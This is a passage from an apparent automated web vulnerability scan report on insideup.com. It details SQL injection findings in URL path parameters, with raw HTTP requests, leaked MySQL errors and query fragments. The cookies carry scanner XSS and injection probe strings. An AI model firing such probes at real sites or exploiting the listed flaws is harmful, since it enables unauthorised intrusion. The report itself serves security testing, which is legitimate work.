Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:32:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lpg3711p3mhoio995lnjr2oa03; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/dima00/project_dynamic_page_updated.php was not found on this server.</p>

1.275. http://www.insideup.com/ppc/leadflow/dima00/project_dynamic_page_updated.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00'/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:32:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ruu1lblagu05nol14fscgcagj7; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/dima00'/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00'/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00' at line 5

Request 2

GET /ppc/leadflow/dima00''/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:32:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=r063cqrfstccnmr42gpo9ed3l6; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00''/project_dynamic_page_updated.php was not found on this server.</p>

1.276. http://www.insideup.com/ppc/leadflow/dima00/project_dynamic_page_updated.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project_dynamic_page_updated.php'?catId=80006&group=dima00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:32:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6aeaf5enj3f2ltv4vslakpbim7; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/dima00/project_dynamic_page_updated.php'?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php'?catId=80006&group=dima00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00' at line 5

Request 2

GET /ppc/leadflow/dima00/project_dynamic_page_updated.php''?catId=80006&group=dima00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 